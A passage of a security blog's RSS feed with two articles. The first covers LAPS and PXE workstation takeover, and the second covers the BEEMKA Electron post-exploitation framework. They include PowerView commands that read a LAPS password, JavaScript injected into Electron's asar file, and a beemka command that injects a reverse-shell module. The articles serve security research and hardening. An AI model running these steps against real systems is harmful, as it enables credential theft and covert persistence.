<div style="text-align: justify;">On the other hand, it is also recommended to require a password before starting the deployment. This can be configured by checking the &#8220;Require a Password when computers use PXE&#8221; checkbox in the SCCM configuration.</div>
<div style="text-align: justify;">More generally, Microsoft&#8217;s recommendations for deploying PXE [<b>PXE SECURITY</b>] are a good starting point to secure any PXE installation.</div>
<div style="text-align: justify;">
<h3>Removing ExtendedRights Privileges, a False Good Idea</h3>
</div>
<div style="text-align: justify;">Microsoft proposes also to reduce the privileges of the creator owner of the object so that he can no longer access the security attributes related to LAPS [<b>LAPS-PERMISSION</b>]. This first solution involves changing the <b>defaultSecurityDescriptor </b>of the &#8220;computer&#8221; class to remove the privilege &#8220;<b>ExtendedRights</b>&#8221; from the user &#8220;<b>OWNER CREATOR</b>&#8220;. The default value, in SSDL format, is :</div>
<p><span class="w-code">(A;;RPCRLCLORCSDDT;;;CO)</span></p>
<div style="text-align: justify;">It will become:</div>
<p><span class="w-code">(A;;RPLCLORCSDDT;;;CO)</span></p>
<div style="text-align: justify;">Thus, every owner of an object of the &#8220;computer&#8221; class loses the extended attributes and can no longer access the LAPS attributes: that&#8217;s it!</div>
<div style="text-align: justify;">Unfortunately, this configuration change is not enough. Indeed, the owner of an object [<b>OWNER</b>] has implicitly the &#8220;<b>Write-Dacl</b>&#8221; privilege on this object. With a little subtlety: the &#8220;Write-Dacl&#8221; right of the owner is not specified in the ACL of the object but exists.</div>
<div style="text-align: justify;">As its name indicates, &#8220;Write-Dacl&#8221; allows to write an ACE in the DACL. It is possible to auto-grant the privilege &#8220;GenericAll&#8221; or &#8220;ExtendedRights&#8221; on an object.</div>
<div style="text-align: justify;">This path can be visualized with <b>BloodHound </b>since version 2.0 (August 2018):</div>
<div></div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<figure id="post-15545 media-15545" class="align-none"><img loading="lazy" decoding="async" class="aligncenter wp-image-15545 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2020/01/2-1.png" alt="" width="640" height="97" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2020/01/2-1.png 640w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/01/2-1-437x66.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/01/2-1-71x11.png 71w" sizes="auto, (max-width: 640px) 100vw, 640px" /></figure>
</div>
<div style="text-align: center;"><i><span style="font-size: x-small;">Fig. 2 : BloodHound Path</span></i></div>
</div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;">This path can be exploited with PowerView with the following command to add the &#8220;GenericAll &#8221; privilege on the &#8220;COMPUTER&#8221; device (commands have to be run as the owner user of the object) :</div>
<div style="text-align: justify;"></div>
<p><span class="w-code"><span class="w-user">PS &gt;</span> <span class="w-root">Import-Module</span> .\PowerView.ps1<br />
<span class="w-user">PS &gt;</span> <span class="w-root">Add-DomainObjectAcl</span> -TargetIdentity COMPUTER -Rights All<br />
<span class="w-user">PS &gt;</span> <span class="w-root">Get-DomainComputer</span> COMPUTER -Properties ms-mcs-AdmPwd,ComputerName,ms-mcs-AdmPwdExpirationTime<br />
ComputerName : COMPUTER<br />
ms-mcs-AdmPwd : <span class="w-grepped">9g)4G+35w;2$</span><br />
ms-mcs-AdmPwdExpirationTime : 08/04/2019<br />
</span></p>
<div style="text-align: justify;"></div>
<div style="text-align: justify;">
<h3>A &#8220;deep&#8221; hardening</h3>
</div>
<div style="text-align: justify;">The owner of a computer object can still read the LAPS password. A first &#8220;homemade&#8221; solution is to regularly follow and change all owner.</div>
<div style="text-align: justify;">For example, it is possible to define the &#8220;Domain Admins&#8221; group:</div>
<p><span class="w-code"><span class="w-root">Import-module</span> ActiveDirectory<br />
<span class="w-cli">$computers</span> = <span class="w-root">Get-ADComputer</span> -Filter <span class="w-server">*</span><br />
foreach (<span class="w-cli">$comp</span> in <span class="w-cli">$computers</span>) {<br />
<span class="w-cli">$comppath</span> = &#8220;<span class="w-server">AD:$($comp.DistinguishedName.ToString())</span>&#8221;<br />
<span class="w-cli">$acl</span> = <span class="w-root">Get-Acl</span> -Path <span class="w-cli">$comppath</span><br />
<span class="w-cli">$objUser</span> = <span class="w-root">New-Object</span> System.Security.Principal.NTAccount(&#8220;<span class="w-server">&lt;DOMAIN&gt;</span>&#8220;, &#8220;<span class="w-server">Domain Admins</span>&#8220;)<br />
<span class="w-cli">$acl</span>.SetOwner(<span class="w-cli">$objUser</span>)<br />
<span class="w-root">Set-Acl</span> -Path <span class="w-cli">$comppath</span> -AclObject <span class="w-cli">$acl</span><br />
}<br />
</span></p>
<div style="text-align: justify;"></div>
<div style="text-align: justify;">Microsoft also offers a second solution by manually changing the privileges of the owner of an object [<b>OWNER-RIGHTS</b>] at the OU level:</div>
<div style="text-align: justify;">
<ul>
<li>Open the Active Directory Users and Computers snap-in</li>
<li>Right-click the OU on which you want to implement Owner Rights, and then click Properties</li>
<li>In the Properties box of the OU, click the Security tab</li>
<li>Under Group or usernames, click Add</li>
<li>Enter &#8220;OWNER CREATOR&#8221; or &#8220;CREATOR OWNER&#8221; in the text box.</li>
<li>Define the permissions granted to the owner of an object</li>
</ul>
</div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;">A specific definition of the privileges of the &#8220;OWNER CREATOR&#8221; user on the OU, i.e the creation of explicit ACE, take precedence over the implicit privileges.</div>
<div style="text-align: justify;">However, this technique must be tested on a test environment before being deployed in production.</div>
<div style="text-align: justify;">
<h2>Conclusion</h2>
</div>
<div style="text-align: justify;">Taken individually, PXE and LAPS provide high security value within an information system. However, the combination, even when properly configured, can lead to the compromise of a large part of the information system.</div>
<div style="text-align: justify;">Today, the article has focused on windows deployment and LAPS but other solutions with high privileges on a lot of computers (WSUS, antivirus or backup agent) can allow pivoting inside the IS.</div>
<p><i><span style="font-size: x-small;">French original publication : MISC n° 103 </span></i><br />
<a href="https://connect.ed-diamond.com/MISC/MISC-103/Compromission-des-postes-de-travail-grace-a-LAPS-et-PXE"><span style="font-size: x-small;">https://connect.ed-diamond.com/MISC/MISC-103/Compromission-des-postes-de-travail-grace-a-LAPS-et-PXE</span></a></p>
<p>&nbsp;</p>
<h3>References</h3>
<ul>
<li><b>[MDT]</b> Documentation Microsoft, « Microsoft Deployment Toolkit »<br />
<a href="https://docs.microsoft.com/en-us/sccm/mdt/">https://docs.microsoft.com/en-us/sccm/mdt/</a></li>
<li><b>[DCHP &amp; PXE] </b>Dominik Heinz, « Client Management blog », page supprimée sur technet<br />
<a href="http://web.archive.org/web/20190219161848/https://blogs.technet.microsoft.com/dominikheinz/2011/03/18/dhcp-pxe-basics/">http://web.archive.org/web/20190219161848/https://blogs.technet.microsoft.com/dominikheinz/2011/03/18/dhcp-pxe-basics/</a></li>
<li><b>[SCCM &amp; PXE]</b> Dominik Heinz, « SCCM PXE Network Boot Process »<br />
<a href="https://www.agileit.com/news/sccm-pxe-network-boot-process-for-windows/">https://www.agileit.com/news/sccm-pxe-network-boot-process-for-windows/</a></li>
<li><b>[NETSPI] </b>Thomas Elling, « Attacks Against Windows PXE Boot Images »<br />
<a href="https://blog.netspi.com/attacks-against-windows-pxe-boot-images/">https://blog.netspi.com/attacks-against-windows-pxe-boot-images/</a></li>
<li><b>[POWERPXE]</b> Rémi Escourrou, Détection et extraction des informations sensibles d’un serveur PXE<br />
<a href="https://github.com/wavestone-cdt/powerpxe">https://github.com/wavestone-cdt/powerpxe</a></li>
<li><b>[AUTOMATEDLAB]</b> Raimund Andrée et Jan-Hendrik Peters, AutomatedLab project<br />
<a href="https://github.com/AutomatedLab/AutomatedLab">https://github.com/AutomatedLab/AutomatedLab</a></li>
<li><b>[DOMAIN-JOIN] </b>Rafel Sosnowski, « Who can add workstation to the domain »<br />
<a href="https://blogs.technet.microsoft.com/dubaisec/2016/02/01/who-can-add-workstation-to-the-domain/">https://blogs.technet.microsoft.com/dubaisec/2016/02/01/who-can-add-workstation-to-the-domain/</a></li>
<li><b>[SECURISATION PXE] </b>Microsoft documentation, « Security and privary for operating system deployment »<br />
<a href="https://docs.microsoft.com/fr-fr/sccm/osd/plan-design/security-and-privacy-for-operating-system-deployment">https://docs.microsoft.com/fr-fr/sccm/osd/plan-design/security-and-privacy-for-operating-system-deployment</a></li>
<li><b>[LAPS-PERMISSION] </b>Jiri Formacek, « LAPS and permission to join computer to domain »<br />
<a href="https://blogs.msdn.microsoft.com/laps/2015/07/17/laps-and-permission-to-join-computer-to-domain/">https://blogs.msdn.microsoft.com/laps/2015/07/17/laps-and-permission-to-join-computer-to-domain/</a></li>
<li><b>[OWNER] </b>Microsoft Documentation, « Owner of a New Object »<br />
<a href="https://docs.microsoft.com/en-us/windows/desktop/secauthz/owner-of-a-new-object">https://docs.microsoft.com/en-us/windows/desktop/secauthz/owner-of-a-new-object</a></li>
<li><b>[OWNER-RIGHTS] </b>Microsoft documentation, « AD DS : Owner Rights »<br />
<a href="https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd125370(v=ws.10)">https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd125370(v=ws.10)</a></li>
</ul>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/en/2020/01/taking-over-windows-workstations-pxe-laps/">Taking over Windows Workstations thanks to LAPS and PXE</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com/en/">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>BEEMKA &#8211; Electron Post-Exploitation When The Land Is Dry</title>
		<link>https://www.riskinsight-wavestone.com/en/2019/08/beemka-electron-post-exploitation-when-the-land-is-dry/</link>
		
		<dc:creator><![CDATA[Rémi Escourrou]]></dc:creator>
		<pubDate>Thu, 29 Aug 2019 16:15:54 +0000</pubDate>
				<category><![CDATA[Challenges]]></category>
		<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[How to]]></category>
		<category><![CDATA[beemka]]></category>
		<category><![CDATA[compte rendu]]></category>
		<category><![CDATA[détection]]></category>
		<category><![CDATA[discord]]></category>
		<category><![CDATA[electron]]></category>
		<category><![CDATA[framework]]></category>
		<category><![CDATA[github]]></category>
		<category><![CDATA[Skype]]></category>
		<category><![CDATA[Slack]]></category>
		<category><![CDATA[vulnerability management]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=15574</guid>

					<description><![CDATA[<p>Lors de les BSides Las Vegas 2019, Pavel « @ sadreck » Tsakalidis a présenté un nouveau framework de post-exploitation qui repose sur l’utilisation d’Electron par des « applications desktop ». Sa présentation démontre que l’utilisation massive d’Electron ces dernières...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/en/2019/08/beemka-electron-post-exploitation-when-the-land-is-dry/">BEEMKA &#8211; Electron Post-Exploitation When The Land Is Dry</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com/en/">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><a style="margin-left: 1em; margin-right: 1em; text-align: center;" href="https://1.bp.blogspot.com/--k9GnoyEsSA/XWeNvLIgHmI/AAAAAAAAArc/MZmZ_YLU1tIfDG85RMpZVTRT_tYOvItFACLcBGAs/s1600/header.png"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/--k9GnoyEsSA/XWeNvLIgHmI/AAAAAAAAArc/MZmZ_YLU1tIfDG85RMpZVTRT_tYOvItFACLcBGAs/s640/header.png" width="640" height="240" border="0" data-original-height="350" data-original-width="927" /></a></p>
<div style="text-align: justify;">
<div>Lors de les BSides Las Vegas 2019, Pavel « @ sadreck » Tsakalidis a présenté un nouveau framework de post-exploitation qui repose sur l’utilisation d’Electron par des « applications desktop ». Sa présentation démontre que l’utilisation massive d’Electron ces dernières années peut être utilisée pour injecter du code malveillant dans des applications légitimes.</div>
<div>Le projet peut être retrouvé sur le dépôt GitHub suivant : <a href="https://github.com/ctxis/beemka">https://github.com/ctxis/beemka</a>.</div>
</div>
<div style="text-align: justify;"></div>
<h3 style="text-align: justify;">Introduction</h3>
<div style="text-align: justify;">Electron est un framework permettant de développer des applications multiplateformes avec des technologies web (Javascript, HTLM et CSS).</div>
<div style="text-align: justify;">Son fonctionnement est assez simple, Electron utilise « node.js » en backend et « Chromium » en frontend :</div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;">
<figure id="post-15898 media-15898" class="align-none"><img loading="lazy" decoding="async" class="alignnone size-medium wp-image-15898" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/08/2-BEEMKA-437x165.png" alt="" width="437" height="165" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/08/2-BEEMKA-437x165.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/08/2-BEEMKA-71x27.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/08/2-BEEMKA-768x290.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/08/2-BEEMKA.png 927w" sizes="auto, (max-width: 437px) 100vw, 437px" /></figure>
<div style="text-align: center;"><span style="font-size: x-small;"><i>Components of Electron </i></span></div>
<div style="text-align: center;"><span style="font-size: x-small;"><i><a href="https://www.wildnettechnologies.com/build-cross-platform-desktop-apps-with-electron/">https://www.wildnettechnologies.com/build-cross-platform-desktop-apps-with-electron/</a></i></span></div>
<div></div>
</div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;">Electron a notamment permis de développer des applications aujourd’hui incontournables en entreprise :</div>
<div style="text-align: justify;"></div>
<div class="separator" style="clear: both; text-align: center;"><a style="margin-left: 1em; margin-right: 1em;" href="https://1.bp.blogspot.com/-tnbHTpC5ffw/XWeNuKPtguI/AAAAAAAAAro/jl-POTPMvlAqpnWfA56w1MVllExfB5BBgCEwYBhgL/s1600/2.png"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-tnbHTpC5ffw/XWeNuKPtguI/AAAAAAAAAro/jl-POTPMvlAqpnWfA56w1MVllExfB5BBgCEwYBhgL/s640/2.png" width="640" height="208" border="0" data-original-height="394" data-original-width="1201" /></a></div>
<div style="text-align: justify;"></div>
<div style="text-align: center;"><i><span style="font-size: x-small;">Applications Electron</span></i></div>
<div style="text-align: justify;"></div>
<h3 style="text-align: justify;">Principe de l’attaque</h3>
<div style="text-align: justify;">Les applications Slack, GitHub ou encore Microsoft Teams utilisent le dossier « App Data » lors de l’installation. Il est donc possible pour l’utilisateur d’accéder en écriture au répertoire d’installation.</div>
<div style="text-align: justify;">Toutes les applications Electron possèdent un dossier &#8220;resources&#8221; dans leur répertoire d&#8217;installation :</div>
<div style="text-align: justify;"></div>
<div class="separator" style="clear: both; text-align: center;"></div>
<div><img decoding="async" class="aligncenter" src="https://1.bp.blogspot.com/-xw6deGNkoZI/XWeNuBTgTyI/AAAAAAAAArg/8Gm4R6E1tA0Ox8jFgFR6Fca7U5HkKcfkwCEwYBhgL/s1600/3.png" /></div>
<div style="text-align: center;"><i><span style="font-size: x-small;">Illustration avec GitHubDesktop</span></i></div>
<div style="text-align: center;"><i> </i></div>
<div style="text-align: justify;">Ce dossier contient généralement :</div>
<ul>
<li>Le dossier « app » qui contient l’application ;</li>
<li>Le fichier « electron.asar » qui prépare l’environnement Chronium au lancement de l’application.</li>
</ul>
<div style="text-align: justify;"></div>
<div style="text-align: justify;">Le fichier « electron.asar » peut être considéré comme une archive qui contient des scripts « *.js » :</div>
<div style="text-align: justify;"><img loading="lazy" decoding="async" class="alignnone size-medium wp-image-16154" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/08/code-beemka-js-437x37.png" alt="" width="437" height="37" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/08/code-beemka-js-437x37.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/08/code-beemka-js-71x6.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/08/code-beemka-js.png 712w" sizes="auto, (max-width: 437px) 100vw, 437px" /></div>
<div></div>
<div></div>
<div class="separator" style="clear: both; text-align: center;"><img decoding="async" src="https://1.bp.blogspot.com/-G0TPjCyHF3c/XWeNuDmYBII/AAAAAAAAAro/OQ7CY0443e8i6GXHJwk_Z-_RAVK686RwgCEwYBhgL/s1600/4.png" /></div>
<div style="text-align: center;"><i><span style="font-size: x-small;">Conteneur « electron.asar »</span></i></div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;">Le fichier « chrome-extension.js » permet la gestion de l’environnement Chronium :</div>
<figure id="post-16156 media-16156" class="align-none"><img loading="lazy" decoding="async" class="size-medium wp-image-16156 alignleft" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/08/code-beem-ka-2-437x23.png" alt="" width="437" height="23" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/08/code-beem-ka-2-437x23.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/08/code-beem-ka-2-71x4.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/08/code-beem-ka-2.png 714w" sizes="auto, (max-width: 437px) 100vw, 437px" /></figure>
<p>&nbsp;</p>
<div style="text-align: justify;"></div>
<div style="text-align: justify;">Pavel propose ainsi d’injecter directement dans ce fichier du code javascript, permettant de lancer une action malveillante lors d’un évènement spécifique :</div>
<p><span class="w-code"><span class="w-root">app</span>.on(&#8216;<span class="w-server">browser-window-focus</span>&#8216;, function (event, bWindow) { <span class="w-root">bWindow</span>.webContents.<span class="w-grepped">executeJavaScript</span>(&#8220;<span class="w-server">alert(Hello Github !!&#8217;);</span>&#8220;) }) </span></p>
<p>&nbsp;</p>
<div style="text-align: justify;">Lors de l’ouverture de l’application (après avoir packé le fichier « electron.asar » et redéposé dans le répertoire « resource »), un pop-up (XSS style) va s’ouvrir dans l’application GitHub Desktop :</div>
<div style="text-align: justify;"></div>
<div><img loading="lazy" decoding="async" class="aligncenter" src="https://1.bp.blogspot.com/-AvxSdvn3kMg/XWeNu780hcI/AAAAAAAAArk/_psRbes4m7YyzYT5icMD_mYD7xRT2YeXQCEwYBhgL/s1600/5.png" width="314" height="177" /></div>
<div style="text-align: justify;"></div>
<div style="text-align: center;"><i><span style="font-size: x-small;">Illustration avec GitHub Desktop</span></i></div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;">Le code est donc correctement exécuté.</div>
<div style="text-align: justify;"></div>
<h3 style="text-align: justify;">Démonstration</h3>
<div style="text-align: justify;">La vidéo suivante présente une démonstration du module « rshell_cmd » dans GitHub Desktop, permettant d’ouvrir un reverse shell vers notre listener :</div>
<div style="text-align: center;"><iframe loading="lazy" src="https://bit.ly/2PBBGb1" width="560" height="315" frameborder="0" allowfullscreen="allowfullscreen"></iframe></div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;">
<div>La commande utilisée est la suivante :</div>
<p><span class="w-code">$ <span class="w-cli">python3</span> ./beemka/beemka.py &#8212;<span class="w-cli">inject </span>&#8212;<span class="w-cli">module </span>rshell_cmd &#8212;<span class="w-cli">asar</span> ./electron_safe.asar &#8212;<span class="w-cli">output </span>./electron.asar</span></p>
</div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;">De plus, l’exécutable de l’application « GitHub Desktop » n’est jamais modifié durant la modification du fichier « asar ». Cette technique peut donc permettre de contourner une politique de filtrage présente sur le poste.</div>
<div style="text-align: justify;"></div>
<h3 style="text-align: justify;">Conclusion</h3>
<div style="text-align: justify;">Le framework présenté par Pavel est très intéressant pour compléter ses techniques de persistance. En effet, il se base sur le fonctionnement intrinsèque d’Electron et ne nécessite pas d’exploiter une vulnérabilité présente dans les applications.</div>
<div style="text-align: justify;">Le framework permet aussi d’aller plus loin en accédant aux données des applications mais aussi de réaliser d’autres opérations comme déposer un keylogger, prendre un Screenshot, …</div>
<div style="text-align: justify;">A ce jour, aucune solution n’était proposée par Electron pour mieux vérifier l’intégrité des fichiers des applications. Le plus simple est d’installer les applications dans « Programmes files » avec les privilèges administrateurs pour ne pas permettre à un utilisateur standard d’éditer le fichier « electron.asar ».</div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;">Ps : BloodHound est aussi une application Electron, une bonne « blague » à faire aux équipes Red/Blue Team :</div>
<div style="text-align: center;"><iframe loading="lazy" src="https://bit.ly/2L30Yuk" width="560" height="315" frameborder="0" allowfullscreen="allowfullscreen"></iframe></div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;">
<div style="text-align: right;"></div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;">
<h4>Références</h4>
</div>
<div style="text-align: justify;"><a href="https://www.contextis.com/en/blog/basic-electron-framework-exploitation">https://www.contextis.com/en/blog/basic-electron-framework-exploitation</a></div>
<div style="text-align: justify;"><a href="https://github.com/ctxis/beemka">https://github.com/ctxis/beemka</a></div>
<div style="text-align: justify;"><a href="https://electronjs.org/docs/tutorial/application-architecture">https://electronjs.org/docs/tutorial/application-architecture</a></div>
<div style="text-align: justify;"><a href="https://www.wildnettechnologies.com/build-cross-platform-desktop-apps-with-electron/">https://www.wildnettechnologies.com/build-cross-platform-desktop-apps-with-electron/</a></div>
<div style="text-align: justify;"></div>
</div>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/en/2019/08/beemka-electron-post-exploitation-when-the-land-is-dry/">BEEMKA &#8211; Electron Post-Exploitation When The Land Is Dry</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com/en/">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
